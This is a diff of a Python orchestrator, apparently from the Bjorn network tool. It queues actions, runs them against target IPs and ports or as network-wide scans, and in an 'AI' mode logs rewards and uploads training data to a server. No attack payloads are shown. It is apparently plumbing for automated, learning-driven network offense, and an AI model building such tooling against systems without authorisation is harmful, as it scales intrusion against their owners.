action_row = self.shared_data.db.get_action_by_class(action_name)
if action_row and not self._is_enabled_value(action_row.get("b_enabled", 1)):
self.shared_data.db.update_queue_status(
queue_id,
'cancelled',
f"Action {action_name} disabled (b_enabled=0)",
)
logger.info(f"Skipping queued disabled action: {action_name}")
return False
except Exception as e:
logger.debug(f"Could not verify b_enabled for {action_name}: {e}")
if action_name not in self.actions:
self.shared_data.db.update_queue_status(
queue_id,
'cancelled',
f"Action {action_name} not loaded",
)
logger.warning(f"Skipping queued action not loaded: {action_name}")
return False
# ┌─────────────────────────────────────────────────────────┐
# │ STEP 1: Capture state BEFORE action (all modes) │
# └─────────────────────────────────────────────────────────┘
state_before = None
if self.feature_logger:
try:
state_before = self._build_host_state(mac)
logger.debug(f"State before captured for {mac}")
except Exception as e:
logger.info_throttled(
f"State capture skipped: {e}",
key="orch_state_before_failed",
interval_s=120.0,
)
# Update status to running
self.shared_data.db.update_queue_status(queue_id, 'running')
# ┌─────────────────────────────────────────────────────────┐
# │ EXECUTE ACTION (existing code) │
# └─────────────────────────────────────────────────────────┘
start_time = time.time()
success = False
try:
# Check if action is loaded
if action_name not in self.actions:
raise Exception(f"Action {action_name} not loaded")
action = self.actions[action_name]
# Prepare row data for compatibility
@@ -115,12 +501,49 @@ class Orchestrator:
"Alive": 1
}
# Prepare status details
if ip and ip != "0.0.0.0":
port_str = str(port).strip() if port is not None else ""
has_port = bool(port_str) and port_str.lower() != "none"
target_display = f"{ip}:{port_str}" if has_port else ip
status_msg = f"{action_name} on {ip}"
details = f"Target: {target_display}"
self.shared_data.action_target_ip = target_display
else:
status_msg = f"{action_name} (Global)"
details = "Scanning network..."
self.shared_data.action_target_ip = ""
# Update shared status for display
self.shared_data.bjorn_orch_status = action_name
self.shared_data.bjorn_status_text2 = self.shared_data.action_target_ip or ip
self.shared_data.update_status(status_msg, details)
# --- AI Dashboard Metadata (AI mode only) ---
if (
self.ai_enabled
and self.shared_data.operation_mode == "AI"
and self._is_action_eligible_for_ai_learning(action_name)
):
decision_method = metadata.get('decision_method', 'heuristic')
self.shared_data.active_action = action_name
self.shared_data.last_decision_method = decision_method
self.shared_data.last_ai_decision = metadata.get('ai_debug', {})
ai_exec_payload = {
"action": action_name,
"method": decision_method,
"origin": decision_origin,
"target": ip,
"ai_method": ai_method,
"ai_confidence": ai_confidence if isinstance(ai_confidence, (int, float)) else None,
"ai_threshold": ai_threshold if isinstance(ai_threshold, (int, float)) else None,
"ai_model_loaded": ai_model_loaded,
"reason": ai_reason,
}
logger.info(f"[AI_EXEC] {json.dumps(ai_exec_payload)}")
# Check if global action (metadata already parsed above)
if metadata.get('is_global') and hasattr(action, 'scan'):
# Execute global scan
action.scan()
@@ -134,23 +557,92 @@ class Orchestrator:
action_name
)
# Determine success
success = (result == 'success')
# Update queue status based on result
if success:
self.shared_data.db.update_queue_status(queue_id, 'success')
logger.success(f"Action {action_name} completed successfully for {ip}")
else:
self.shared_data.db.update_queue_status(queue_id, 'failed')
logger.warning(f"Action {action_name} failed for {ip}")
except Exception as e:
logger.error(f"Error executing action {action_name}: {e}")
self.shared_data.db.update_queue_status(queue_id, 'failed', str(e))
success = False
finally:
if (
self.ai_enabled
and self.shared_data.operation_mode == "AI"
and self._is_action_eligible_for_ai_learning(action_name)
):
ai_done_payload = {
"action": action_name,
"success": bool(success),
"method": source,
"origin": decision_origin,
}
logger.info(f"[AI_DONE] {json.dumps(ai_done_payload)}")
self.shared_data.active_action = None
# Clear status text
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
# Reset Status to Thinking/Idle
self.shared_data.update_status("Thinking", "Processing results...")
duration = time.time() - start_time
# ┌─────────────────────────────────────────────────────────┐
# │ STEP 2: Log execution features (AUTO + AI modes) │
# └─────────────────────────────────────────────────────────┘
if self.feature_logger and state_before and self._is_action_eligible_for_ai_learning(action_name):
try:
reward = self._calculate_reward(
action_name=action_name,
success=success,
duration=duration,
mac=mac,
state_before=state_before,
state_after=self._build_host_state(mac),
)
self.feature_logger.log_action_execution(
mac_address=mac,
ip_address=ip,
action_name=action_name,
success=success,
duration=duration,
reward=reward,
raw_event={
'port': port,
'action': action_name,
'queue_id': queue_id,
# metadata already parsed — no second json.loads
'metadata': metadata,
# Tag decision source so the training pipeline can weight
# human choices (MANUAL would be logged if orchestrator
# ever ran in that mode) vs automated ones.
'decision_source': self.shared_data.operation_mode,
'human_override': False,
},
)
logger.debug(f"Features logged for {action_name} (mode={self.shared_data.operation_mode})")
except Exception as e:
logger.info_throttled(
f"Feature logging skipped: {e}",
key="orch_feature_log_failed",
interval_s=120.0,
)
elif self.feature_logger and state_before:
logger.debug(f"Feature logging disabled for {action_name} (excluded from AI learning)")
return success
def run(self):
"""Main loop: start scheduler and consume queue"""
@@ -164,9 +656,13 @@ class Orchestrator:
# Main execution loop
idle_time = 0
consecutive_idle_logs = 0
self._last_background_task = 0
while not self.shared_data.orchestrator_should_exit:
try:
# Allow live mode switching from the UI without restarting the process.
self._sync_ai_components()
# Get next action from queue
next_action = self.get_next_action()
@@ -174,14 +670,17 @@ class Orchestrator:
# Reset idle counters
idle_time = 0
consecutive_idle_logs = 0
self._loop_error_backoff = 1.0
# Execute the action
self.execute_queued_action(next_action)
else:
# IDLE mode
idle_time += 1
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
# Log periodically (less spam)
if idle_time % 30 == 0:  # Every 30 seconds
@@ -192,18 +691,96 @@ class Orchestrator:
# Event-driven wait (max 5s to check for exit signals)
self.shared_data.queue_event.wait(timeout=5)
self.shared_data.queue_event.clear()
# Periodically process background tasks (even if busy)
current_time = time.time()
sync_interval = int(getattr(self.shared_data, "ai_sync_interval", 60))
if current_time - self._last_background_task > sync_interval:
self._process_background_tasks()
self._last_background_task = current_time
except Exception as e:
logger.error(f"Error in orchestrator loop: {e}")
time.sleep(self._loop_error_backoff)
self._loop_error_backoff = min(self._loop_error_backoff * 2.0, 10.0)
# Cleanup on exit (OUTSIDE while loop)
if self.scheduler:
self.scheduler.stop()
self.shared_data.queue_event.set()
if self.scheduler_thread and self.scheduler_thread.is_alive():
self.scheduler_thread.join(timeout=10.0)
if self.scheduler_thread.is_alive():
logger.warning("ActionScheduler thread did not exit cleanly")
logger.info("Orchestrator stopped")
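The loop's error path sleeps with a doubling backoff capped at 10 s, and `_loop_error_backoff` resets to 1.0 whenever an action is dequeued. The resulting sleep schedule can be tabulated with a small helper (`backoff_schedule` is a hypothetical name used only for this sketch):

```python
def backoff_schedule(errors, start=1.0, factor=2.0, cap=10.0):
    """Sleep durations the loop would use across consecutive errors."""
    delay, sleeps = start, []
    for _ in range(errors):
        sleeps.append(delay)               # time.sleep(delay) in the real loop
        delay = min(delay * factor, cap)   # doubled, capped at 10s
    return sleeps

print(backoff_schedule(5))  # [1.0, 2.0, 4.0, 8.0, 10.0]
```

Compared to the old fixed `time.sleep(1)`, this keeps a persistently failing loop from spinning while still recovering quickly after a single transient error.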
def _process_background_tasks(self):
"""Run periodic tasks like consolidation, upload retries, and model updates (AI mode only)."""
if not (self.ai_enabled and self.shared_data.operation_mode == "AI"):
return
ai_server_contact_events: List[bool] = []
try:
# Consolidate features
batch_size = int(getattr(self.shared_data, "ai_batch_size", 100))
max_batches = max(1, int(getattr(self.shared_data, "ai_consolidation_max_batches", 2)))
stats = self.data_consolidator.consolidate_features(
batch_size=batch_size,
max_batches=max_batches,
)
if stats.get("records_processed", 0) > 0:
logger.info(f"AI Consolidation: {stats['records_processed']} records processed")
logger.debug(f"DEBUG STATS: {stats}")
# Auto-export after consolidation
max_export_records = max(100, int(getattr(self.shared_data, "ai_export_max_records", 1000)))
filepath, count = self.data_consolidator.export_for_training(
format="csv",
compress=True,
max_records=max_export_records,
)
if filepath:
logger.info(f"AI export ready: {count} records -> {filepath}")
self.data_consolidator.upload_to_server(filepath)
if getattr(self.data_consolidator, "last_server_attempted", False):
ai_server_contact_events.append(
bool(getattr(self.data_consolidator, "last_server_contact_ok", False))
)
# Always retry any pending uploads when the server comes back.
self.data_consolidator.flush_pending_uploads(max_files=2)
if getattr(self.data_consolidator, "last_server_attempted", False):
ai_server_contact_events.append(
bool(getattr(self.data_consolidator, "last_server_contact_ok", False))
)
except Exception as e:
logger.info_throttled(
f"AI background tasks skipped: {e}",
key="orch_ai_background_failed",
interval_s=120.0,
)
# Check for model updates (tolerant when server is offline)
try:
if self.ai_engine and self.ai_engine.check_for_updates():
logger.info("AI model updated from server")
if self.ai_engine and getattr(self.ai_engine, "last_server_attempted", False):
ai_server_contact_events.append(
bool(getattr(self.ai_engine, "last_server_contact_ok", False))
)
elif self.ai_engine and not bool(getattr(self.ai_engine, "model_loaded", False)):
# No model loaded and no successful server contact path this cycle.
ai_server_contact_events.append(False)
except Exception as e:
logger.debug(f"AI model update check skipped: {e}")
self._update_ai_server_health(ai_server_contact_events)
if __name__ == "__main__":
orchestrator = Orchestrator()
orchestrator.run()

Binary file not shown.
